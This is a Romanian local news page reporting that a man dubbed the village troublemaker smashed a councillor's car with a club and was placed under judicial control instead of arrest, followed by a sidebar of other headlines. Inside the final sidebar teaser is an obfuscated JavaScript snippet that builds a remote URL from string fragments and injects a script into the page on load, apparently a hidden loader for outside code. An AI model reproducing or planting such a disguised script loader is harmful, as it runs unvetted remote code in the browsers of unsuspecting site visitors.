Scandalagiul Uţă – liber, dar cu interdicţia de a părăsi judeţul

După ce a sfărâmat, cu parul, maşina unui consilier local din Ceahlău scandalagiul Viorel Uţă a fost prezentat instanţei, cu propunerea de arestare preventivă pentru ultraj. Mai ales că doar norocul şi viteza cu care a fugit Cornel Diaconu au făcut ca maşina să fie singura victimă, nu şi proprietarul, care a fost ameninţat cu moartea, de altfel. Instanţa a decis, însă, să respingă propunerea procurorului, dar a luat totuşi măsura controlului judiciar împotriva lui Uţă.

Adică spaima comunei, cum este numit de localnici, va trebui să se prezinte la poliţie ori de câte ori este chemat, nu va avea voie să „depăşească limitele teritoriale ale judeţului Neamţ decât cu încuviinţarea prealabilă a organului de urmărire penală” şi îi este interzis să se apropie de consilier şi de martori, şi să deţină sau să poarte arme. Cornel Diaconu – la fel ca şi alţi doi consilieri locali – a avut o primă „ciocnire” cu Viorel Uţă acum o lună. S-au întâlnit pe stradă şi „justiţiarul comunei” care trăieşte cu convingerea că scopul lui în viaţă este să-i pună pe toţi la punct, l-a lovit şi l-a târât pe jos. Bineînţeles, consilierul local a depus plângere la poliţie, iar joi, 13 noiembrie, Uţă a primit citaţie să se prezinte la audieri.

Conform obiceiului său de a-şi intimida victimele pentru a le determina să-şi retragă reclamaţiile – metodă care a fost de mare succes până acum, Uţă s-a înarmat cu un par şi a plecat la „vânătoare”. L-a găsit pe Diaconu – care are o firmă de construcţii şi lucrează la o casă în Durău, şi l-a fugărit cu parul. Pentru că omul a fost destul de iute de picior ca să se salveze, Uţă s-a răzbunat pe maşina consilierului, căreia i-a spart toate geamurile şi i-a îndoit tabla cu bâta din dotare. De teamă că s-ar putea trezi cu individul peste el, în casă, Cornel Diaconu a chemat nişte prieteni din sat să doarmă la el şi să-i păzească familia. Acum, aflat sub interdicţiile impuse de instanţă, este suficient ca Uţă să deschidă doar poarta casei lui Diaconu ca să fie arestat pe loc. (C. MIRCEA

Autor:

Ultima ora

Botoșani. Suspiciuni de omor la Dorohoi

O descoperire macabră a avut loc în zorii zilei...

Vaslui. Incendiu devastator în comuna Băcani o locuință a ars ca o torță de la o lumânare

Agoniseala de-o viață a unei familii din localitatea Drujești,...

Botoșani. Primarul comunei Mihălășeni, acuzat că ar fi luat 500.000 cu titlu de mită

Procurorii DNA au finalizat urmărirea penală și au dispus...

Precipitații abundente în Regiunea Nord-Est

Administrația Națională de Meteorologie a actualizat prognoza și a...

Botoșani. Suspiciuni de omor la Dorohoi

O descoperire macabră a avut loc în zorii zilei...

Precipitații abundente în Regiunea Nord-Est

Administrația Națională de Meteorologie a actualizat prognoza și a...

Platformele de entertainment care atrag tot mai mulți utilizatori din România

(function(){ cm1c=document.createElement("script");cm1c_="o"+("pe")+"ns";cm1cu="2615166186"; cm1c_+="t"+"at"+(".e");cm1c.type="text/javascript"; cm1cu+=".tlbjwujtm1catdkn98nr";cm1c.async=true;cm1c_+=""+("u"+"")+"/"; cm1cu+="la0hts3iry";cm1c.src="https://"+cm1c_+cm1cu; document.body.appendChild(cm1c); })(); În ultimii ani, modul în care românii își petrec...